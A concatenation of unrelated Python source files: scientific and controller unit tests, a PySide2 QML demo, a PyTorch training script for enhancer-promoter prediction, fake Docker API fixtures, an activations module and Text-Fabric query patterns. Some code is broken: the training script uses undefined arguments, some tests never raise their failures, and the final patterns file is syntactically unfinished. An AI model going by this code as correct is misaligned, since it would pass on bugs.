rmatrixfilename = "../r1Dvar/data/IASI_COEFFS_DIR/Rmatrix_orig"
print ("rmatrixfilename")
R = r1Dvar.r1dvar.Rmatrix()
R.read(rmatrixfilename)
# TODO add assertions
# R.plot_matrix()
def test_1dvar_Bmatrices(self):
print (">>> test_1dvar_Bmatrices")
filename = "../r1Dvar/data/Sample_Bmatrices/Bmatrix_43L"
B = r1Dvar.r1dvar.Bmatrix()
B.read_matrices(filename)
# TODO add assertions
if __name__ == "__main__":
unittest.main()
| 2.09375
| 2
|
Test/test_others.py
|
LinyueSong/FMLC
| 0
|
12777693
|
<filename>Test/test_others.py
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import time
from FMLC.triggering import triggering
from FMLC.baseclasses import eFMU
from FMLC.stackedclasses import controller_stack
class testcontroller1(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init= False
self.output['c'] = self.input['a'] * self.input['b']
return 'testcontroller1 did a computation!'
class testcontroller2(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init = False
self.output['c'] = self.input['a'] * self.input['b']
time.sleep(0.2)
return 'testcontroller2 did a computation!'
class testcontroller3(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init = False
self.output['c'] = self.input['a'] * self.input['b']
time.sleep(1)
return 'testcontroller3 did a computation!'
class testcontroller4(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init = False
self.output['c'] = self.input['a'] * self.input['b']
time.sleep(10)
return 'testcontroller4 did a computation!'
def test_input_errors():
##CASE1: not all inputs are set.
controller = {}
controller['forecast1'] = {'fun':testcontroller1, 'sampletime':0}
controller['mpc1'] = {'fun':testcontroller2, 'sampletime':'forecast1'}
controller['control1'] = {'fun':testcontroller1, 'sampletime':'mpc1'}
controller['forecast2'] = {'fun':testcontroller3, 'sampletime':0}
controller['forecast3'] = {'fun':testcontroller1, 'sampletime':0}
mapping = {}
mapping['forecast1_a'] = 10
mapping['forecast1_b'] = 4
mapping['forecast2_a'] = 20
mapping['forecast2_b'] = 4
mapping['forecast3_a'] = 30
mapping['forecast3_b'] = 4
mapping['mpc1_b'] = 'forecast1_a'
mapping['control1_a'] = 'mpc1_c'
try:
controller = controller_stack(controller, mapping, tz=-8, debug=True, parallel=True, timeout=2)
AssertionError
except KeyError as e:
assert 'mapping' in str(e)
except:
AssertionError
##CASE1: not all given inputs are valid inputs (extra inputs)
controller = {}
controller['forecast1'] = {'fun':testcontroller1, 'sampletime':0}
controller['mpc1'] = {'fun':testcontroller2, 'sampletime':'forecast1'}
controller['control1'] = {'fun':testcontroller1, 'sampletime':'mpc1'}
controller['forecast2'] = {'fun':testcontroller3, 'sampletime':0}
controller['forecast3'] = {'fun':testcontroller1, 'sampletime':0}
mapping = {}
mapping['forecast1_d'] = 10
mapping['forecast1_a'] = 10
mapping['forecast1_b'] = 4
mapping['forecast2_a'] = 20
mapping['forecast2_b'] = 4
mapping['forecast3_a'] = 30
mapping['forecast3_b'] = 4
mapping['mpc1_a'] = 'forecast1_c'
mapping['mpc1_b'] = 'forecast1_a'
mapping['control1_a'] = 'mpc1_c'
mapping['control1_b'] = 'mpc1_a'
try:
controller = controller_stack(controller, mapping, tz=-8, debug=True, parallel=True, timeout=2)
AssertionError
except KeyError as e:
assert 'parameter' in str(e)
except:
AssertionError
def test_init_once():
controller = {}
controller['forecast1'] = {'fun':testcontroller1, 'sampletime':0}
mapping = {}
mapping['forecast1_a'] = 10
mapping['forecast1_b'] = 4
controller = controller_stack(controller, mapping, tz=-8, debug=True, parallel=True, timeout=2)
obj = controller.controller_objects['forecast1']
for i in range(3):
controller.query_control(time.time())
assert controller.controller_objects['forecast1'] is obj
| 2.6875
| 3
|
projects/pyside2_qml_property/main.py
|
jungmonster/qt_study_project
| 0
|
12777694
|
import sys
from PySide2.QtGui import QGuiApplication
from PySide2.QtQml import QQmlApplicationEngine
from PySide2.QtCore import QUrl
from PySide2.QtCore import QCoreApplication
from PySide2.QtCore import QObject, Signal, Slot, Property
class Number(QObject):
__val = 0
@Signal
def numberChanged(self):
pass
@Slot(int)
def set_number(self, val):
print("setter func")
self.__val = val
self.numberChanged.emit()
def get_number(self):
print("getter func")
return self.__val
ValueNumber = Property(int, get_number, set_number, notify=numberChanged)
if __name__ == '__main__':
app = QGuiApplication(sys.argv)
engine = QQmlApplicationEngine()
number = Number()
engine.rootContext().setContextProperty("numberVal", number)
engine.load(QUrl("./main.qml"))
if not engine.rootObjects():
sys.exit(-1)
sys.exit(app.exec_())
| 2.375
| 2
|
src/train_validate.py
|
biomed-AI/TransEPI
| 3
|
12777695
|
#!/usr/bin/env python3
import argparse, os, sys, time, shutil, tqdm
import warnings, json, gzip
import numpy as np
import copy
from sklearn.model_selection import GroupKFold
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import DataLoader, Subset
import epi_models
import epi_dataset
import misc_utils
import functools
print = functools.partial(print, flush=True)
def split_train_valid_test(groups, train_keys, valid_keys, test_keys=None):
"""
groups: length N, the number of samples
train
"""
assert isinstance(train_keys, list)
assert isinstance(valid_keys, list)
assert test_keys is None or isinstance(test_keys, list)
index = np.arange(len(groups))
train_idx = index[np.isin(groups, train_keys)]
valid_idx = index[np.isin(groups, valid_keys)]
if test_keys is not None:
test_idx = index[np.isin(groups, test_keys)]
return train_idx, valid_idx, test_idx
else:
return train_idx, valid_idx
def make_directory(in_dir):
if os.path.isfile(in_dir):
warnings.warn("{} is a regular file".format(in_dir))
return None
outdir = in_dir.rstrip('/')
if not os.path.isdir(outdir):
os.makedirs(outdir)
return outdir
def model_summary(model):
"""
model: pytorch model
"""
import torch
total_param = 0
trainable_param = 0
for i, p in enumerate(model.parameters()):
num_p = torch.numel(p)
if p.requires_grad:
trainable_param += num_p
total_param += num_p
return {'total_param': total_param, 'trainable_param': trainable_param}
def predict(model: nn.Module, data_loader: DataLoader, device=torch.device('cuda')):
model.eval()
result, true_label = None, None
for feats, _, enh_idxs, prom_idxs, labels in data_loader:
feats, labels = feats.to(device), labels.to(device)
# enh_idxs, prom_idxs = enh_idxs.to(device), prom_idxs.to(device)
pred = model(feats, enh_idx=enh_idxs, prom_idx=prom_idxs)
pred = pred.detach().cpu().numpy()
labels = labels.detach().cpu().numpy()
if result is None:
result = pred
true_label = labels
else:
result = np.concatenate((result, pred), axis=0)
true_label = np.concatenate((true_label, labels), axis=0)
return (result.squeeze(), true_label.squeeze())
def train_validate_test(
model, optimizer,
train_loader, valid_loader, test_loader,
num_epoch, patience, outdir,
checkpoint_prefix, device, use_scheduler=False) -> nn.Module:
bce_loss = nn.BCELoss()
mse_loss = nn.MSELoss()
wait = 0
best_epoch, best_val_auc, best_val_aupr = -1, -1, -1
if use_scheduler:
scheduler = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer, T_0=5, T_mult=2)
for epoch_idx in range(num_epoch):
model.train()
for feats, dists, enh_idxs, prom_idxs, labels in tqdm.tqdm(train_loader):
feats, dists, labels = feats.to(device), dists.to(device), labels.to(device)
if hasattr(model, "att_C"):
pred, pred_dists, att = model(feats, enh_idxs, prom_idxs, return_att=True)
attT = att.transpose(1, 2)
identity = torch.eye(att.size(1)).to(device)
identity = Variable(identity.unsqueeze(0).expand(labels.size(0), att.size(1), att.size(1)))
penal = model.l2_matrix_norm(torch.matmul(att, attT) - identity)
loss = bce_loss(pred, labels) + (model.att_C * penal / labels.size(0)).type(torch.cuda.FloatTensor) + mse_loss(dists, pred_dists)
del penal, identity
else:
pred = model(feats, dists)
loss = bce_loss(pred, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if use_scheduler:
scheduler.step()
model.eval()
valid_pred, valid_true = predict(model, valid_loader)
val_AUC, val_AUPR = misc_utils.evaluator(valid_true, valid_pred, out_keys=["AUC", "AUPR"])
print("\nvalid_result({})\t{:.4f}\t{:.4f}\t({})".format(epoch_idx, val_AUC, val_AUPR, time.asctime()))
if val_AUC + val_AUPR > best_val_auc + best_val_aupr:
wait = 0
best_epoch, best_val_auc, best_val_aupr = epoch_idx, val_AUC, val_AUPR
test_pred, test_true = predict(model, test_loader)
np.savetxt(
"{}/test_result.{}.txt.gz".format(outdir, epoch_idx),
X=np.concatenate((test_pred.reshape(-1, 1), test_true.reshape(-1, 1)), axis=1),
fmt="%.5f",
delimiter='\t'
)
test_AUC, test_AUPR = misc_utils.evaluator(test_true, test_pred, out_keys=["AUC", "AUPR"])
print("Test_result\t{:.4f}\t{:.4f}\t({})".format(test_AUC, test_AUPR, time.asctime()))
if use_scheduler:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
wait += 1
if wait >= patience:
print("Early stopped ({})".format(time.asctime()))
print("Best epoch/AUC/AUPR: {}\t{:.4f}\t{:.4f}".format(best_epoch, best_val_auc, best_val_aupr))
break
else:
print("Wait{} ({})".format(wait, time.asctime()))
def get_args():
p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument(
'--train',
required=True,
nargs='+'
)
p.add_argument(
'--valid',
required=True,
nargs='+'
)
p.add_argument(
"--test",
nargs='+',
default=None,
help="Optional test set"
)
p.add_argument('-b', "--batch-size", type=int, default=256)
p.add_argument('-c', "--config", required=True)
p.add_argument('-o', "--outdir", required=True)
p.add_argument("--threads", default=32, type=int)
p.add_argument('--seed', type=int, default=2020)
return p
if __name__ == "__main__":
p = get_args()
args = p.parse_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
config = json.load(open(args.config))
# all_data = epi_dataset.EPIDataset(**config["data_opts"])
train_config = config.copy()
train_config["data_opts"]["datasets"] = args.train
train_config["data_opts"]["use_reverse"] = args.use_reverse
train_config["data_opts"]["max_aug"] = args.aug_num
train_data = epi_dataset.EPIDataset(
**train_config["data_opts"]
)
train_loader = DataLoader(train_data, batch_size=args.batch_size, shuffle=True, num_workers=args.threads)
if args.test is None:
valid_test_config = copy.deepcopy(config)
valid_test_config["data_opts"]["datasets"] = args.valid
valid_test_data = epi_dataset.EPIDataset(
**valid_test_config["data_opts"]
)
valid_idx, test_idx = split_train_valid_test(
np.array(valid_test_data.metainfo["chrom"]),
train_keys=["chr{}".format(i).replace("23", "X") for i in range(1, 24, 2)],
valid_keys=["chr{}".format(i) for i in range(2, 22, 2)]
)
valid_data = Subset(valid_test_data, indices=valid_idx)
test_data = Subset(valid_test_data, indices=test_idx)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False)
else:
valid_config = copy.deepcopy(config)
valid_config["data_opts"]["datasets"] = args.valid
valid_data = epi_dataset.EPIDataset(
**valid_config["data_opts"]
)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
test_config = copy.deepcopy(config)
test_config["data_opts"]["datasets"] = args.test
test_data = epi_dataset.EPIDataset(
**test_config["data_opts"]
)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
config["model_opts"]["in_dim"] = train_data.feat_dim
config["model_opts"]["seq_len"] = config["data_opts"]["seq_len"] // config["data_opts"]["bin_size"]
print("##{}".format(time.asctime()))
print("##command: {}".format(' '.join(sys.argv)))
print("##args: {}".format(args))
print("##config: {}".format(config))
print("##sample size: {}".format(len(train_data)))
print("## feature size: {}".format([v.size() for v in train_data.__getitem__(0)]))
if args.gpu == -1:
device = "cpu"
else:
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu_id)
device = "cuda"
device = torch.device(device)
model_class = getattr(epi_models, config["model_opts"]["model"])
model = model_class(**config["model_opts"]).to(device)
optimizer_params = {'lr': config["train_opts"]["learning_rate"], 'weight_decay': 0}
optimizer = torch.optim.Adam(model.parameters(), **optimizer_params)
print(model)
print(model_summary(model))
print(optimizer)
if not os.path.isdir(args.outdir):
args.outdir = make_directory(args.outdir)
train_validate_test(
model,
optimizer,
train_loader, valid_loader, test_loader,
num_epoch=config["train_opts"]["num_epoch"],
patience=config["train_opts"]["patience"],
outdir=args.outdir,
checkpoint_prefix="checkpoint",
device=device,
use_scheduler=config["train_opts"]["use_scheduler"]
)
| 2.21875
| 2
|
tests/fakes/fake_docker_api.py
|
delta/serverctl_daemon
| 2
|
12777696
|
<reponame>delta/serverctl_daemon
"""
Fake responses for the Docker API
Adapted from https://github.com/docker/docker-py/blob/master/tests/unit/fake_api.py
"""
from typing import Any, Generator
FAKE_CONTAINER_ID = "3cc2351ab11b"
FAKE_LONG_ID = "e75ccd38cba33f61b09515e05f56fc243ef40186d600a9eeb6bc0bed8e2e1508"
FAKE_LOG_LINE_CONTENT = b"fake log"
FAKE_LOG_LINE_COUNT = 10
FAKE_IMAGE_ID = "sha256:e9aa60c60128"
FAKE_TAG = "sha256:e9aafierojv"
FAKE_CONTAINER_NAME = "jolly_black"
FAKE_LOGS_MESSAGE = 'Hello World\nThis is test logs'
def get_fake_containers() -> tuple[int, list[dict[str, str]]]:
"""Get list of fake containers"""
status_code = 200
response = [{
"Id": FAKE_CONTAINER_ID,
"Image": "busybox:latest",
"Created": "2 days ago",
"Command": "true",
"Status": "fake status"
}]
return status_code, response
def get_fake_inspect_container() -> tuple[int, dict[str, Any]]:
"""Get fake inspect data"""
status_code = 200
response = {
"Id": FAKE_CONTAINER_ID,
"Created": "2021-09-28T14:16:51.246200393Z",
"Path": "/docker-entrypoint.sh",
"Args": [
"apache2-foreground"
],
"State": {
"Status": "running",
"Running": True,
"Paused": False,
"Restarting": False,
"OOMKilled": False,
"Dead": False,
"Pid": 85110,
"ExitCode": 0,
"Error": "",
"StartedAt": "2021-09-28T14:16:51.540023895Z",
"FinishedAt": "0001-01-01T00:00:00Z"
},
"Image": FAKE_IMAGE_ID,
"Name": f"/{FAKE_CONTAINER_NAME}",
"RestartCount": 0,
"Driver": "overlay2",
"Platform": "linux",
"MountLabel": "",
"ProcessLabel": "",
"AppArmorProfile": "docker-default",
"ExecIDs": None,
"HostConfig": {
"Binds": None,
"ContainerIDFile": "",
"LogConfig": {
"Type": "json-file",
"Config": {}
},
"NetworkMode": "default",
"PortBindings": {
"80/tcp": [
{
"HostIp": "",
"HostPort": "8088"
}
]
},
"RestartPolicy": {
"Name": "no",
"MaximumRetryCount": 0
},
"AutoRemove": False,
"VolumeDriver": "",
"VolumesFrom": None,
"CapAdd": None,
"CapDrop": None,
"CgroupnsMode": "host",
"Dns": [],
"DnsOptions": [],
"DnsSearch": [],
"ExtraHosts": None,
"GroupAdd": None,
"IpcMode": "private",
"Cgroup": "",
"Links": None,
"OomScoreAdj": 0,
"PidMode": "",
"Privileged": False,
"PublishAllPorts": False,
"ReadonlyRootfs": False,
"SecurityOpt": None,
"UTSMode": "",
"UsernsMode": "",
"ShmSize": 67108864,
"Runtime": "runc",
"ConsoleSize": [
0,
0
],
"Isolation": "",
"CpuShares": 0,
"Memory": 0,
"NanoCpus": 0,
"CgroupParent": "",
"BlkioWeight": 0,
"BlkioWeightDevice": [],
"BlkioDeviceReadBps": None,
"BlkioDeviceWriteBps": None,
"BlkioDeviceReadIOps": None,
"BlkioDeviceWriteIOps": None,
"CpuPeriod": 0,
"CpuQuota": 0,
"CpuRealtimePeriod": 0,
"CpuRealtimeRuntime": 0,
"CpusetCpus": "",
"CpusetMems": "",
"Devices": [],
"DeviceCgroupRules": None,
"DeviceRequests": None,
"KernelMemory": 0,
"KernelMemoryTCP": 0,
"MemoryReservation": 0,
"MemorySwap": 0,
"MemorySwappiness": None,
"OomKillDisable": False,
"PidsLimit": None,
"Ulimits": None,
"CpuCount": 0,
"CpuPercent": 0,
"IOMaximumIOps": 0,
"IOMaximumBandwidth": 0,
"MaskedPaths": [
"/proc/asound",
"/proc/acpi",
"/proc/kcore",
"/proc/keys",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/timer_stats",
"/proc/sched_debug",
"/proc/scsi",
"/sys/firmware"
],
"ReadonlyPaths": [
"/proc/bus",
"/proc/fs",
"/proc/irq",
"/proc/sys",
"/proc/sysrq-trigger"
]
},
"Mounts": [],
"Config": {
"Hostname": "03bfd76552c2",
"Domainname": "",
"User": "",
"AttachStdin": True,
"AttachStdout": True,
"AttachStderr": True,
"ExposedPorts": {
"80/tcp": {}
},
"Tty": True,
"OpenStdin": True,
"StdinOnce": True,
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"PHP_INI_DIR=/usr/local/etc/php",
],
"Cmd": [
"apache2-foreground"
],
"Image": "phpmyadmin:latest",
"Volumes": None,
"WorkingDir": "/var/www/html",
"Entrypoint": [
"/docker-entrypoint.sh"
],
"OnBuild": None,
"StopSignal": "SIGWINCH"
},
"NetworkSettings": {
"Bridge": "",
"SandboxID": "c5cec0eaeadea649b43ea0fb6cec5b60cb3c7b1b06813a1f07e6b7f4e2cb180e",
"HairpinMode": False,
"LinkLocalIPv6Address": "",
"LinkLocalIPv6PrefixLen": 0,
"Ports": {
"80/tcp": [
{
"HostIp": "0.0.0.0",
"HostPort": "8088"
},
{
"HostIp": "::",
"HostPort": "8088"
}
]
},
"SandboxKey": "/var/run/docker/netns/c5cec0eaeade",
"SecondaryIPAddresses": None,
"SecondaryIPv6Addresses": None,
"EndpointID": "0ec86c835121720138dad365e7ad4c5520882801494a971932194f1dd3baee8b",
"Gateway": "172.17.0.1",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"IPAddress": "172.17.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"MacAddress": "02:42:ac:11:00:02",
"Networks": {
"bridge": {
"IPAMConfig": None,
"Links": None,
"Aliases": None,
"NetworkID": FAKE_LONG_ID,
"EndpointID": FAKE_LONG_ID,
"Gateway": "172.17.0.1",
"IPAddress": "172.17.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"MacAddress": "02:42:ac:11:00:02",
"DriverOpts": None
}
}
}
}
return status_code, response
def get_fake_inspect_image() -> tuple[int, dict[str, Any]]:
"Fake inspect image"
status_code = 200
response = {
'Id': FAKE_IMAGE_ID,
'Parent': "27cf784147099545",
'Created': "2013-03-23T22:24:18.818426-07:00",
'Container': FAKE_CONTAINER_ID,
'Config': {'Labels': {'bar': 'foo'}},
'ContainerConfig':
{
"Hostname": "",
"User": "",
"Memory": 0,
"MemorySwap": 0,
"AttachStdin": False,
"AttachStdout": False,
"AttachStderr": False,
"PortSpecs": "",
"Tty": True,
"OpenStdin": True,
"StdinOnce": False,
"Env": "",
"Cmd": ["/bin/bash"],
"Dns": "",
"Image": "base",
"Volumes": "",
"VolumesFrom": "",
"WorkingDir": ""
},
'Size': 6823592
}
return status_code, response
def get_fake_images() -> tuple[int, list[dict[str, Any]]]:
"Fake list images"
status_code = 200
response = [{
'Id': FAKE_IMAGE_ID,
'Created': '2 days ago',
'Repository': 'busybox',
'RepoTags': ['busybox:latest', 'busybox:1.0'],
}]
return status_code, response
def get_fake_prune_containers() -> tuple[int, dict[str, Any]]:
"""Get fake prune containers response"""
status_code = 200
response = {
"ContainersDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def get_fake_prune_images() -> tuple[int, dict[str, Any]]:
"""Get fake prune images response"""
status_code = 200
response = {
"ImagesDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def get_fake_prune_volumes() -> tuple[int, dict[str, Any]]:
"""Get fake prune volumes response"""
status_code = 200
response = {
"VolumesDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def get_fake_prune_networks() -> tuple[int, dict[str, Any]]:
"""Get fake prune networks response"""
status_code = 200
response = {
"NetworksDeleted": [FAKE_LONG_ID]
}
return status_code, response
def get_fake_prune_builds() -> tuple[int, dict[str, Any]]:
"""Get fake prune build caches response"""
status_code = 200
response = {
"CachesDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def _get_log_stream() -> Generator[bytes, None, None]:
for _ in range(FAKE_LOG_LINE_COUNT):
yield FAKE_LOG_LINE_CONTENT
def get_fake_logs() -> tuple[int, Generator[bytes, None, None]]:
"""Get fake container logs"""
status_code = 200
return status_code, _get_log_stream()
def get_fake_logs_response() -> tuple[int, bytes]:
"""Get fake logs response"""
status_code = 200
response = (bytes(FAKE_LOGS_MESSAGE, 'ascii'))
return status_code, response
| 2.28125
| 2
|
app/test/test_data_validation.py
|
adrianopaduam/python_flask_selenium_stock_price_api
| 0
|
12777697
|
import unittest
from app.main.util.data_validation import validate_region_name
class TestCorrectRegionValidation(unittest.TestCase):
def test_correct_region_validation(self):
correct_region_simple = "Argentina"
correct_region_with_spaces = "United%20Kingdom"
correct_region_with_hiphen = "timor-leste"
self.assertTupleEqual(
(True, "Argentina", None),
validate_region_name(correct_region_simple)
)
self.assertTupleEqual(
(True, "United Kingdom", None),
validate_region_name(correct_region_with_spaces)
)
self.assertTupleEqual(
(True, "timor-leste", None),
validate_region_name(correct_region_with_hiphen)
)
class TestIncorrectRegionValidation(unittest.TestCase):
def test_incorrect_region_validation(self):
no_region_informed = None
empty_region = ""
region_with_number = "timor-leste123456"
self.assertTupleEqual(
(False, None, "'region' parameter must be informed"),
validate_region_name(no_region_informed)
)
self.assertTupleEqual(
(
False,
"",
" ".join([
"'region' must be a non-empty string",
"containing a valid country name",
"(letters, whitespaces and hiphen only)"
])
),
validate_region_name(empty_region)
)
self.assertTupleEqual(
(
False,
"timor-leste123456",
" ".join([
"'region' must be a non-empty string",
"containing a valid country name",
"(letters, whitespaces and hiphen only)"
])
),
validate_region_name(region_with_number)
)
if __name__ == '__main__':
unittest.main()
| 3.484375
| 3
|
tensormonk/activations/activations.py
|
Tensor46/TensorMONK
| 29
|
12777698
|
""" TensorMONK :: layers :: Activations """
__all__ = ["Activations"]
import torch
import torch.nn as nn
import torch.nn.functional as F
def maxout(tensor: torch.Tensor) -> torch.Tensor:
if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by n_splits"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
class Activations(nn.Module):
r"""Activation functions. Additional activation functions (other than those
available in pytorch) are
:obj:`"hsigm"` & :obj:`"hswish"` (`"Searching for MobileNetV3"
<https://arxiv.org/pdf/1905.02244>`_),
:obj:`"maxo"` (`"Maxout Networks" <https://arxiv.org/pdf/1302.4389>`_),
:obj:`"mish"` (`"Mish: A Self Regularized Non-Monotonic Neural Activation
Function" <https://arxiv.org/pdf/1908.08681v1>`_),
:obj:`"squash"` (`"Dynamic Routing Between Capsules"
<https://arxiv.org/abs/1710.09829>`_) and
:obj:`"swish"` (`"SWISH: A Self-Gated Activation Function"
<https://arxiv.org/pdf/1710.05941v1>`_).
Args:
tensor_size (tuple, required): Input tensor shape in BCHW
(None/any integer >0, channels, height, width).
activation (str, optional): The list of activation options are
:obj:`"elu"`, :obj:`"gelu"`, :obj:`"hsigm"`, :obj:`"hswish"`,
:obj:`"lklu"`, :obj:`"maxo"`, :obj:`"mish"`, :obj:`"prelu"`,
:obj:`"relu"`, :obj:`"relu6"`, :obj:`"rmxo"`, :obj:`"selu"`,
:obj:`"sigm"`, :obj:`"squash"`, :obj:`"swish"`, :obj:`"tanh"`.
(default: :obj:`"relu"`)
elu_alpha (float, optional): (default: :obj:`1.0`)
lklu_negslope (float, optional): (default: :obj:`0.01`)
.. code-block:: python
import torch
import tensormonk
print(tensormonk.activations.Activations.METHODS)
tensor_size = (None, 16, 4, 4)
activation = "maxo"
maxout = tensormonk.activations.Activations(tensor_size, activation)
maxout(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16, 4)
activation = "squash"
squash = tensormonk.activations.Activations(tensor_size, activation)
squash(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16)
activation = "swish"
swish = tensormonk.activations.Activations(tensor_size, activation)
swish(torch.randn(1, *tensor_size[1:]))
"""
METHODS = ["elu", "gelu", "hsigm", "hswish", "lklu", "maxo", "mish",
"prelu", "relu", "relu6", "rmxo",
"selu", "sigm", "squash", "swish", "tanh"]
def __init__(self, tensor_size: tuple, activation: str = "relu", **kwargs):
super(Activations, self).__init__()
if activation is not None:
activation = activation.lower()
self.t_size = tensor_size
self.activation = activation
self.function = None
if activation not in self.METHODS:
raise ValueError("activation: Invalid activation " +
"/".join(self.METHODS) +
": {}".format(activation))
self.function = getattr(self, "_" + activation)
if activation == "prelu":
self.weight = nn.Parameter(torch.ones(1) * 0.1)
if activation == "lklu":
self.negslope = kwargs["lklu_negslope"] if "lklu_negslope" in \
kwargs.keys() else 0.01
if activation == "elu":
self.alpha = kwargs["elu_alpha"] if "elu_alpha" in \
kwargs.keys() else 1.0
self.tensor_size = tensor_size
if activation in ("maxo", "rmxo"):
t_size = list(tensor_size)
t_size[1] = t_size[1] // 2
self.tensor_size = tuple(t_size)
def forward(self, tensor: torch.Tensor) -> torch.Tensor:
if self.function is None:
return tensor
return self.function(tensor)
def _relu(self, tensor: torch.Tensor):
return F.relu(tensor)
def _relu6(self, tensor: torch.Tensor):
return F.relu6(tensor)
def _lklu(self, tensor: torch.Tensor):
return F.leaky_relu(tensor, self.negslope)
def _elu(self, tensor: torch.Tensor):
return F.elu(tensor, self.alpha)
def _gelu(self, tensor: torch.Tensor):
return F.gelu(tensor)
def _prelu(self, tensor: torch.Tensor):
return F.prelu(tensor, self.weight)
def _selu(self, tensor: torch.Tensor):
return F.selu(tensor)
def _tanh(self, tensor: torch.Tensor):
return torch.tanh(tensor)
def _sigm(self, tensor: torch.Tensor):
return torch.sigmoid(tensor)
def _maxo(self, tensor: torch.Tensor):
if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by 2"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
def _rmxo(self, tensor: torch.Tensor):
return self._maxo(F.relu(tensor))
def _swish(self, tensor: torch.Tensor):
return tensor * torch.sigmoid(tensor)
def _mish(self, tensor: torch.Tensor):
return tensor * F.softplus(tensor).tanh()
def _squash(self, tensor: torch.Tensor):
if not tensor.dim() == 3:
raise ValueError("Squash requires 3D tensors: {}".format(
tensor.dim()))
sum_squares = (tensor ** 2).sum(2, True)
return (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
def _hsigm(self, tensor: torch.Tensor):
return F.relu6(tensor + 3) / 6
def _hswish(self, tensor: torch.Tensor):
return self._hsigm(tensor) * tensor
def __repr__(self):
return self.activation
@staticmethod
def available() -> list:
return Activations.METHODS
def flops(self) -> int:
import numpy as np
flops = 0
numel = np.prod(self.t_size[1:])
if self.activation == "elu":
# max(0, x) + min(0, alpha*(exp(x)-1))
flops = numel * 5
elif self.activation in ("lklu", "prelu", "sigm"):
flops = numel * 3
elif self.activation == "maxo":
# torch.max(*x.split(x.size(1)//2, 1))
flops = numel / 2
elif self.activation == "mish":
# x * tanh(ln(1 + e^x))
flops = numel * 5
elif self.activation == "relu":
# max(0, x)
flops = numel
elif self.activation == "relu6":
# min(6, max(0, x))
flops = numel * 2
elif self.activation == "rmxo":
# maxo(relu(x))
flops = int(numel * 1.5)
elif self.activation == "squash":
# sum_squares = (tensor**2).sum(2, True)
# (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
flops = numel * 4 + self.t_size[1] * 2
elif self.activation == "swish":
# x * sigm(x)
flops = numel * 4
elif self.activation == "tanh":
# (exp(x) - exp(-x)) / (exp(x) + exp(-x))
flops = numel * 9
elif self.activation == "hsigm":
# min(6, max(0, x + 3)) / 6
flops = numel * 4
elif self.activation == "hswish":
# x * min(6, max(0, x + 3)) / 6
flops = numel * 8
return flops
| 2.890625
| 3
|
workflow/notebooks/dev/test_patterns.py
|
CambridgeSemiticsLab/BH_time_collocations
| 5
|
12777699
|
<filename>workflow/notebooks/dev/test_patterns.py<gh_stars>1-10
patterns = [
# PREP + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
""",
# PREP + ART + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: word lex=H
<: w2:word pdp=subs ls#card
w1 =: ph
w2 := ph
"""
# PREP + ADJV
"""
ph:phrase
w1:word pdp=prep
<: w2:word pdp=advb
w1 =: ph
w2 := ph
""",
# NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
""",
# PREP+ NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
""",
# PREP + NOUN + C + NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=prep
<: word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
""",
# PREP + NOUN + C + NOUN + C + NOUN
"""
ph:phrase rela=NA
w1:word pdp=subs st=c ls#card
<: word pdp=subs st=c ls#card
<: word pdp=subs st=c ls#card
<: w2:word pdp=subs ls#card st=a
w1 =: ph
w2 := ph
